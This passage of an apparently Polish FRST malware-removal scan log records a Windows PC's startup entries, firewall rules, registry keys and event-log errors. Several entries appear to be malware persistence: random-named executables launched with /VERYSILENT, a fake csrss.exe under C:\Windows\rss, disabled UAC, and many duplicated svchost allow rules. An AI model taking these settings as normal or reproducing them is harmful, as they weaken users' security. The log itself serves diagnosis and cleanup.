""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2" ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:34 - 2018-12-11 11:35 - 000000027 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-2258082688-2428047095-3221846902-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\pc\AppData\Roaming\Mozilla\Firefox\Tapeta pulpitu.bmp DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == Załączenie wejścia w fixlist spowoduje jego usunięcie. MSCONFIG\Services: a2AntiMalware => 2 MSCONFIG\Services: AdobeARMservice => 2 MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3 MSCONFIG\Services: AMD External Events Utility => 2 MSCONFIG\Services: cphs => 3 MSCONFIG\Services: cplspcon => 2 MSCONFIG\Services: DSAService => 2 MSCONFIG\Services: GoogleChromeElevationService => 3 MSCONFIG\Services: gupdate => 2 MSCONFIG\Services: gupdatem => 3 MSCONFIG\Services: IAStorDataMgrSvc => 2 MSCONFIG\Services: igfxCUIService2.0.0.0 => 2 MSCONFIG\Services: Intel(R) Capability Licensing Service TCP IP Interface => 3 MSCONFIG\Services: Intel(R) SUR QC SAM => 3 MSCONFIG\Services: Intel(R) TPM Provisioning Service => 2 MSCONFIG\Services: jhi_service => 2 MSCONFIG\Services: Killer Service V2 => 2 MSCONFIG\Services: LMS => 2 MSCONFIG\Services: localNETService => 2 MSCONFIG\Services: MBAMService => 2 MSCONFIG\Services: MozillaMaintenance => 3 MSCONFIG\Services: WAASP Performer => 2 MSCONFIG\Services: WsAppService => 2 MSCONFIG\Services: ZAMSvc => 2 MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Killer Network Manager.lnk => C:\Windows\pss\Killer Network Manager.lnk.CommonStartup MSCONFIG\startupfolder: C:^Users^pc^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MagicDisc.lnk => C:\Windows\pss\MagicDisc.lnk.Startup MSCONFIG\startupfolder: C:^Users^pc^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Shortcut to Primary output from Start (Active).lnk => C:\Windows\pss\Shortcut to Primary output from Start (Active).lnk.Startup MSCONFIG\startupreg: 1492035 => "C:\Users\pc\AppData\Roaming\i0alkiex4u0\uuejapyf2uf.exe" /VERYSILENT MSCONFIG\startupreg: 1883899 => "C:\Users\pc\AppData\Roaming\h22rsvnb5ov\inbpxzbkm5j.exe" /VERYSILENT MSCONFIG\startupreg: 207368 => "C:\Users\pc\AppData\Roaming\fo4dkoc2nsx\y2kv0vkuh04.exe" /VERYSILENT MSCONFIG\startupreg: 49QO9U23U0LOB8B => "C:\Program Files\C61WSASJA8\C61WSASJA.exe" MSCONFIG\startupreg: 4Kzc'47yh+.exe => C:\Program Files\WhoCrashed\T3TD3C6NVVAPCLVHQDLCDUDAA4\4Kzc'47yh+.exe MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe" MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe" MSCONFIG\startupreg: ANGTZQZB7DV29WT => "C:\Program Files\SP243SXYIN\N3KCVWNHD.exe" MSCONFIG\startupreg: AVRZJBPC1A57AO6 => "C:\Program Files\OK0U934KFM\OK0U934KF.exe" MSCONFIG\startupreg: DivineBird => "C:\Windows\rss\csrss.exe" MSCONFIG\startupreg: DSATray => C:\Program Files (x86)\Intel Driver and Support Assistant\DsaTray.exe MSCONFIG\startupreg: emsisoft anti-malware => "C:\Program Files\Emsisoft Anti-Malware\a2guard.exe" /d=60 MSCONFIG\startupreg: Google Update => C:\Users\pc\AppData\Local\Google\Update\1.3.33.17\GoogleUpdateCore.exe MSCONFIG\startupreg: IAStorIcon => "C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe" "C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" 60 MSCONFIG\startupreg: StartCN => "C:\Program Files\AMD\CNext\CNext\cnext.exe" atlogon MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: USB3MON => "C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe" MSCONFIG\startupreg: ZNBQ91HYXY2UALM => "C:\Program Files\LGHNMQ7DFQ\LGHNMQ7DF.exe" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{902A2A60-193A-4B3C-9D9B-23CF2019F9B6}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{14E257A8-9E08-4154-A9DA-FB74BE17F6B4}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe FirewallRules: [{18DE20EA-B0B7-4071-B9B8-3F145C3DB864}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe FirewallRules: [{F924A76C-7B20-40C0-9F6E-ABD1AB2A6EA5}] => (Allow) C:\Program Files (x86)\Winamp\winamp.exe FirewallRules: [TCP Query User{181AE0AE-7266-4E2D-81B9-E97D442EBF5F}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe FirewallRules: [UDP Query User{9FA6EDE0-2B98-4CED-AC76-43BF03785BDD}C:\program files (x86)\internet explorer\iexplore.exe] => (Allow) C:\program files (x86)\internet explorer\iexplore.exe FirewallRules: [TCP Query User{F85A23B8-5EDF-4B12-AE3D-0E40DE7100B0}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe FirewallRules: [UDP Query User{256537E9-DCD4-483B-B01F-90FB29F4AEBC}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe FirewallRules: [TCP Query User{EED2DC88-B991-4F68-B43F-7934C954D3EF}C:\program files (x86)\synesis\onvif device manager\odm.exe] => (Allow) C:\program files (x86)\synesis\onvif device manager\odm.exe FirewallRules: [UDP Query User{0002F8A0-40EB-432C-9F3F-FC7B19B910EE}C:\program files (x86)\synesis\onvif device manager\odm.exe] => (Allow) C:\program files (x86)\synesis\onvif device manager\odm.exe FirewallRules: [TCP Query User{B15F0E87-BDE1-4798-9B12-FCF661C0533E}C:\program files (x86)\synesis\onvif device manager\odm.player.host.exe] => (Allow) C:\program files (x86)\synesis\onvif device manager\odm.player.host.exe FirewallRules: [UDP Query User{80789F95-DD4F-4EF5-ADD0-C5CF2EC54B04}C:\program files (x86)\synesis\onvif device manager\odm.player.host.exe] => (Allow) C:\program files (x86)\synesis\onvif device manager\odm.player.host.exe FirewallRules: [{3D6FA5EF-8BCB-4E07-8934-ED6857E423E5}] => (Allow) C:\Program Files (x86)\Deskshare\IP Camera Viewer 4\IP Camera Viewer.exe FirewallRules: [{44E0066A-38E7-402A-8D1E-BC700FBB2373}] => (Allow) C:\Program Files (x86)\Deskshare\IP Camera Viewer 4\IP Camera Viewer.exe FirewallRules: [TCP Query User{0533C61C-F17B-44A7-ADED-07EA54ACA419}C:\program files (x86)\serial port tool\ptzcontrollerv3.2\ptzcontrollerv3.exe] => (Allow) C:\program files (x86)\serial port tool\ptzcontrollerv3.2\ptzcontrollerv3.exe FirewallRules: [UDP Query User{A8279676-35D0-4E31-92BA-B1961CD64ECF}C:\program files (x86)\serial port tool\ptzcontrollerv3.2\ptzcontrollerv3.exe] => (Allow) C:\program files (x86)\serial port tool\ptzcontrollerv3.2\ptzcontrollerv3.exe FirewallRules: [{2010CCA7-4CC2-41B6-A27D-265FCF3D8A88}] => (Allow) C:\Program Files (x86)\Perfect IP Camera Recorder\ipcrecorder.exe FirewallRules: [{39B14144-E47C-49D7-BFE1-273260F8EF14}] => (Allow) C:\Program Files (x86)\Perfect IP Camera Recorder\ipcrecorder.exe FirewallRules: [{C5AE0993-25FD-4FB3-8E37-8ADA4F46648B}] => (Allow) C:\Program Files\Pale Moon\palemoon.exe FirewallRules: [{B0152092-7496-4E22-B218-048C0FC7E2A9}] => (Allow) C:\Program Files\Pale Moon\palemoon.exe FirewallRules: [{B266D160-C354-4173-BBBC-03211E58D8F8}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{20CE4732-3B1E-457A-9FE7-9A26DB9C5AE3}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{6BBAB765-BD10-4A97-BE44-54412A1E9703}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{93932677-51BB-4DBE-8096-FAA4E6C47E6F}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{52398C9B-5132-42CD-A9C7-E905EE605D91}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{7036998E-7DD4-46AE-B75B-27D06D7C4CFD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{AA08F4BD-087B-47AE-A094-22CB732C0A34}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{1C9734EF-7E5D-4AC2-8012-D1D51C2B395D}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{FE6BE613-B773-4359-AFAC-FB1B4131C231}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{FCCBDFC4-A7B7-4B05-BC0A-06D9D99A31EA}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{4D4E0E09-7619-4452-B34B-0292199380D5}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{4F55ED3E-E6CA-4DCC-BC06-139849AEB788}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{4B637E1B-9058-4280-BFF2-9B5364A4C855}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{60E335A6-04B9-4C99-89D9-1240560BAB16}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{A5AEF0B4-81F9-48AE-9FC2-BE03E80B95F1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{191272B5-8636-43E8-B25A-72AD5B806C68}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{7D489058-EF9C-467C-B44E-176B90D71555}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{3F8D75FF-A07B-4A1F-A4CE-B65FBBBA1E9E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{CCBFE6BF-1E21-421E-8E4F-8297F83F058B}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{FD3440DA-C0C8-4F84-BABC-48B3D9B472CA}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{C9C964E9-91DE-4C1E-9295-1A2E6628C315}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{ECA63CE5-5502-4B30-AE27-02BEF71692CA}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{6C1E6D00-44D9-41A1-AEFC-91395FBED15D}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{CBC7D6F0-E348-4483-9E16-9060F3A9D69F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{2BAB6FE1-79C3-445B-BBC6-E689D5E7575A}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{092855A4-9A60-429D-B240-C7CA2205E02A}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{621E7524-A500-4AD5-B715-2D99D9D65762}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{F39804FF-704D-42FC-91AD-2E66587ACAD5}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{273DFF5F-8FCA-4851-A652-C77FD54D5B9F}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{D418CD09-8191-4096-B8CF-C27CADB087E1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{9773C8C1-9D64-4AE9-89A0-C0D3501E0143}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{894738A4-F8DD-43F1-92B1-EA90F5411BB8}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{7FBB1656-D366-4AD1-8FCE-EA10B992F6C2}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{8D07C320-53E6-4137-AB37-9D79054DACE3}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{77B4C10D-DD1F-4077-ACCA-C974D8272072}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{5BE5EC97-226E-4EFC-93A3-91CA64FDDAAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{3BFB5F01-80B0-4448-8BD2-4F42C84E7CC2}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{28776DB9-5ADA-4A7A-83D6-143793E5953F}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{7E1EE1CE-AB30-4BDD-89C7-840152037D9B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{56AAB93C-970E-4B66-9508-A94265DDBFF1}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{850D06A3-146F-4CAC-94F4-76F8F737CBB3}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{282F4459-4971-473B-92CE-3A56B0D8DD45}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{A05ED15B-3A36-43F9-9E98-F96BFDA65863}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{E0B10EC6-D91B-4493-AD12-B63A2166D8AB}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{365991E7-A2AC-43B2-8530-4588A16D2938}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{1544557D-3AE1-484C-AC09-7C0CC07ACF35}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{228BF192-9235-444D-B3E1-F6D51E38019D}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{3567AC65-9820-4F70-8CC7-3FB3FBA1E76D}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{366A2DCA-7B1F-4C36-BAAF-3EDC93DBF7B7}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{357635CF-2051-4D7A-833E-855DB08FDD8E}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{7007D27D-8D9F-4048-881D-17804F021DAE}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{2094A8A7-938B-4267-850B-981DC42BA978}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{0BF7F884-8F5D-4412-9FBD-670B5AABA472}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{F540FF9F-9FC2-44FC-BB93-24C3BFE77D89}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{F27A6A10-341A-4E95-BF42-E520A0B8EDA1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{6DDF9E82-A539-4093-ADA8-9483E0EE906A}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{9F179B3A-9F90-4023-A276-910885D284A5}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{3F5AEFA7-EF46-41EB-A6D1-8BB970B35023}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{21580474-CEC9-4A32-8225-4E39EAE946AD}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{1BB8C87D-D86D-44DE-A757-EBFC5772E930}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{36A2E25C-4F24-4688-8638-72FC233F7942}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{F586D436-72A6-42D7-BEC8-7A9BBA528824}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{043E3B9B-7259-43D3-BE9D-F856154C139D}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{49F43CA6-0ABB-4B99-969F-662FE5ABE449}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{2DB22618-86A5-40C3-9F1F-757DDCF89236}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{9F1C3F5D-70E9-495C-9E7D-A5DF9F4B8DC8}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{E460405A-5C3A-46EA-9D65-57C7A42BA600}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{DC432ADD-A6CE-437E-A129-7605A8AC89CC}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{BACEF838-AFA3-4358-851E-F9D32D6641A6}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{28E77A6B-B32B-4CF4-83E4-001CF5D6838B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{F40B8917-34EE-4B97-A039-0F0F6D70FBA8}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{B5FEAAD9-B6C9-479E-8A5E-F67DC403C32E}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{A7F1FF60-28FC-4285-B2C5-C4DFAC66097E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{BA3F04A3-F6E5-486E-ADF1-992E048EEECF}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{D6B0F806-E39C-42D1-AA2B-3F595317E0E8}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{438D2120-4134-4E85-9012-04C95A84E783}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{25AF8029-548C-45AB-9F6A-D5AEC4F0AC60}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{7970BF22-578B-4A2D-A8E3-B10AEDA79BBA}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{6F3AEEFA-532F-4090-AE21-F064F29365F5}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{789623AB-C41D-45BC-BD54-3F9B781E749B}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{5551595C-4C2F-40A3-A0A1-29C1FB77DDBE}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{7C5AB4FC-870A-4B83-91BB-2D7D4148A624}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{661C654F-6775-462F-9B3B-AF04691F6754}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{D070C419-38C1-4352-A30A-9DFBEE56BFC8}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{A7E654F9-BE7E-4F84-9F35-E33DD0C90CD2}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{F95E2AB7-33D1-4C41-8097-98EF46EF1DC4}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{D7678B89-1FF3-4C97-A495-25AD05DE9AFD}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{538ADE50-5447-47E1-BCFD-2BBCC62387CB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{4604E815-3014-4FFB-B557-971FA2CCC375}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{636CACB5-521E-4815-B762-AA6E502248AA}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{FFF3B557-B880-4D57-ADF1-87D1141087CD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{0DABEEA8-3CC6-4F0C-B2E0-B10228F27B96}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{8F18CB62-174E-4BA1-8500-5292EDBDFA00}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{0230D643-63FA-4E03-A437-E2D0F9535CF3}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{6CC0CBFF-FA1A-451D-B337-347743177C09}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{73C9471D-08EA-4C6B-AA82-74B1BD5591A7}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{14FA0F86-0A65-41A8-B8D1-9031A84C9301}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{29D137FD-9C51-4653-8703-0420437A9E19}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{7EB10A76-8F90-42C5-82A7-8AD25419AA7A}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{BB96A288-FAD2-40E6-A8A5-D21E54CA8658}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{C693FD23-65FE-45ED-8307-E87430E5B33E}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{B526B7C2-76CF-481E-8AD0-2C7AF72DAD90}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{7BD4C720-A996-4A25-A6FD-F702419FCF12}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{314C90D1-73DA-42D3-A9C9-6D11AF15E309}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{831C1556-34CF-468A-9D57-79B21768315E}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{EEE01EC0-C46F-4A57-B6DA-4CEAA60D0AD5}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{7104B234-67DF-4CBD-8D66-1B2ACEE78A7E}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{31F96718-3485-4F77-9D1A-DF889E787DA4}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{D9BB50F6-F0B7-4BE4-8488-2467834DB29E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{7FFB158C-49AF-419E-A381-F3CCEE9B9E45}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{AB7BFAB9-C9B2-40E9-AE67-6F4217323528}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{82B237CB-E80E-4613-A77D-91C8E6FD99BD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{B42FD383-E478-4F2A-9BAA-94D2C146C142}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{21F7BB5D-EB38-44E8-BA1D-9E937C2997A5}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{FAAC1EFD-0C9E-4A2E-94A5-1B23580127EC}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{71169FAA-0980-4CC2-AFB0-9DE4F14DAEA3}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{FDBA4AB1-DA4A-48CE-8F14-16249C5EAAEE}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{1F923F65-2C65-46C7-92F6-273270F694F4}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{61E42A63-CBFA-4BF1-8BC8-50F947EDE9ED}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{53905476-8C38-412F-906B-C4A1E255F8CF}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{12E934D4-F3DE-4456-B474-CC1E8460D938}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{DCDE8369-5A54-46E6-84F3-29A311514921}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{AEB54C4D-36FF-49A3-B57C-296DCF543FA7}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{67BCBA00-5294-4CA6-B71E-1678B4516F5E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{76BDEED2-CA46-4213-A0E5-BEA893C008F2}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{082E3529-645F-4173-BE54-5D95CB331E55}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{8AC3FE4B-6269-409A-989A-4F0C4387AF77}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe FirewallRules: [{038E6342-7B21-44BC-827A-418C0C79BF67}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{F775CC4E-6438-48B6-A678-55763C23D4D5}] => (Allow) C:\Windows\SysWOW64\svchost.exe FirewallRules: [{4B04F25F-0B19-486D-9427-A6F2509F4665}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe ==================== Punkty Przywracania systemu ========================= ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Standardowa klawiatura PS/2 Description: Standardowa klawiatura PS/2 Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318} Manufacturer: (Klawiatury standardowe) Service: i8042prt Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: Security Processor Loader Driver Description: Security Processor Loader Driver Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: spldr Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. Name: Mysz Microsoft PS/2 Description: Mysz Microsoft PS/2 Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: i8042prt Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24) Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed. Devices stay in this state if they have been prepared for removal. After you remove the device, this error disappears.Remove the device, and this error should be resolved. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (12/21/2018 10:43:13 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: mbamservice.exe, wersja: 3.2.0.704, sygnatura czasowa: 0x5b9acf90 Nazwa modułu powodującego błąd: SelfProtectionSdk.dll, wersja: 3.0.0.360, sygnatura czasowa: 0x5b995ba2 Kod wyjątku: 0x40000015 Przesunięcie błędu: 0x000000000014e2bf Identyfikator procesu powodującego błąd: 0x7e0 Godzina uruchomienia aplikacji powodującej błąd: 0x01d499108bcac820 Ścieżka aplikacji powodującej błąd: C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe Ścieżka modułu powodującego błąd: C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll Identyfikator raportu: d4d60294-0504-11e9-9453-d0509985d86a Error: (12/21/2018 10:40:35 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: atieclxx.exe, wersja: 6.14.11.1199, sygnatura czasowa: 0x55c01e59 Nazwa modułu powodującego błąd: atieclxx.exe, wersja: 6.14.11.1199, sygnatura czasowa: 0x55c01e59 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000000000041e36 Identyfikator procesu powodującego błąd: 0x1984 Godzina uruchomienia aplikacji powodującej błąd: 0x01d49911387a8ba3 Ścieżka aplikacji powodującej błąd: C:\Windows\system32\atieclxx.exe Ścieżka modułu powodującego błąd: C:\Windows\system32\atieclxx.exe Identyfikator raportu: 76f41313-0504-11e9-9453-d0509985d86a Error: (12/21/2018 10:37:57 AM) (Source: MsiInstaller) (EventID: 11704) (User: pc-Komputer) Description: Produkt: AMD Catalyst Install Manager -- Błąd 1704. Instalacja JbejkGYEklfajifwgw jest w tej chwili wstrzymana. Przed kontynuacją musisz cofnąć zmiany dokonane przez tę instalację. Chcesz cofnąć zmiany? Error: (12/21/2018 10:23:12 AM) (Source: System Restore) (EventID: 8193) (User: ) Description: Nie można utworzyć punktu przywracania (Proces = C:\Users\pc\AppData\Local\Temp\jrt\CreateRestorePoint.exe "JRT 